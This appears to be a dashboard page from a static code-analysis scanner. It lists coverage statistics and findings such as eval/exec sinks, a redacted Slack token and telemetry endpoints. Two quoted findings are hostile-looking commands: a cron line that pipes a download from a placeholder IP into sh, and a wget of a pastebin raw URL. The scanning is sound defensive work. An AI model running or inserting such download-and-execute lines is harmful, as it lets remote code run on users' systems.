Code analysis

static source read inferred

Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.

analysis coverage 86% of 59,694 analyzable servers
51197 analyzed
7502 re-analysis due
995 not analyzable
0 not yet analyzed
4849 source gone
not analyzable
795 too large 200 no source

Running analyzer v33. The scanner changelog explains what each version detects and when it changed.

code findings 15 shown
  1. HIGH dynamic exec Aigen-Protocol/aigen-protocol eval()/exec() exec(compile(src, f"<{fn.__name__}>", "exec", dont_inherit=True), namespace) # noqa: S102
  2. HIGH committed secret adanb13/cirdan Slack app token xapp-1…(21 chars, redacted)
  3. MEDIUM suspicious endpoint purroy/majordomo api.telegram.org url = f"https://api.telegram.org/bot{token}/{method}"
  4. MEDIUM suspicious endpoint purroy/majordomo api.telegram.org url = f"https://api.telegram.org/bot{token}/{method}"
  5. MEDIUM suspicious endpoint Juwon1405/agentic-dart 1.2.3.4 "*/5 * * * * root curl https://1.2.3.4/x | sh\n"
  6. MEDIUM suspicious endpoint Juwon1405/agentic-dart pastebin.com "data_url": "https://pastebin.com/raw/abc123",
  7. MEDIUM suspicious endpoint Juwon1405/agentic-dart pastebin.com "wget https://pastebin.com/raw/abc\n",
  8. HIGH dynamic exec raj713335/CircuVolt_AI eval()/exec() exec(code_str, global_scope, local_scope)
  9. HIGH dynamic exec 1999AZZAR/browser-agent-mcp new Function() const fn = new Function('args', `"use strict"; return (async () => { ${script} })()`);
  10. HIGH obfuscation @atlisp/mcp dynamic require()/import() const mod = await import(path6.join(HANDLERS_DIR, handlerFile + ".js"));
  11. HIGH dynamic exec luizhbesper/react-native-mcp new Function() const fn = new Function('globalThis', `return (${expression});`);
  12. MEDIUM suspicious endpoint IvanKuria/bloxscout us.i.posthog.com (telemetry) destination: "https://us.i.posthog.com/:path*",
  13. MEDIUM suspicious endpoint IvanKuria/bloxscout us-assets.i.posthog.com (telemetry) destination: "https://us-assets.i.posthog.com/static/:path*",
  14. MEDIUM suspicious endpoint IvanKuria/bloxscout us.i.posthog.com (telemetry) host: process.env.NEXT_PUBLIC_POSTHOG_HOST ?? "https://us.i.posthog.com",
  15. MEDIUM suspicious endpoint IvanKuria/bloxscout us.posthog.com (telemetry) ui_host: "https://us.posthog.com",